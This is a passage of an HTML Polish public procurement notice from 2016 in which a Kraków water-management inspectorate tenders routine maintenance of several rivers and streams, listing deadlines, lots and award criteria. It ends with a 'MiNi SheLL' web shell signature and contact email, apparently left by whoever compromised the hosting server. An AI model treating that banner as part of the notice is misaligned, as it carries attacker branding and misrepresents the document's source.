<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MZMiUW Inspektorat Rejonowy w Krakowie ul.Kraszewskiego 36 30-110 Kraków pokój 32A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.06.2016 godzina 08:00, miejsce: MZMiUW Inspektorat Rejonowy w Krakowie ul.Kraszewskiego 36 30-110 Kraków pokój 32A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Konserwacja nieuregulowanej rzeki Krzyworzeka w km 0+950-1+030 w miejscowości Skrzynka, gmina Dobczyce, powiat myślenicki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> konserwacja bieżąca.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.34.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. warunki płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Konserwacja nieuregulowanego potoku Lipnik w km 4+400 - 4+600 (0,20km) w miejscowości Lipnik, gmina Wiśniowa, powiat myślenicki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> konserwacja bieżąca.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.34.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. warunki płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Konserwacja nieuregulowanego potoku Rudnickiego w km 3+300 - 3+340 (0,04km) w miejscowości Rudnik, gmina Sułkowice, powiat myślenicki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> konserwacja bieżąca.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.34.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. warunki płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Konserwacja nieuregulowanego potoku Harbutówka w km 1+800 - 1+900 (0,10km) w miejscowości Sułkowice, gm. Sułkowice, powiat myślenicki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> konserwacja bieżąca.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.34.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> 1.Konserwacja uregulowanej rzeki Szreniawy  w km 0+000 - 1+923, rozmiar 1,923 km; m. Witów, gmina Koszyce, powiat proszowicki
2.Konserwacja nieuregulowanej rzeki Szreniawy w km 13+700 - 15+400, rozmiar 1,70 km,  m. Kuchary, gmina Nowe Brzesko, powiat proszowicki
3. Konserwacja nieuregulowanej rzeki Szreniawy w km 30+000 - 35+000, rozmiar 5,00 km, m. Proszowice, Gniazdowice, Jazdowiczki, gmina Proszowice, powiat proszowicki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> konserwacja bieżąca.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.34.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. warunki płatności - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com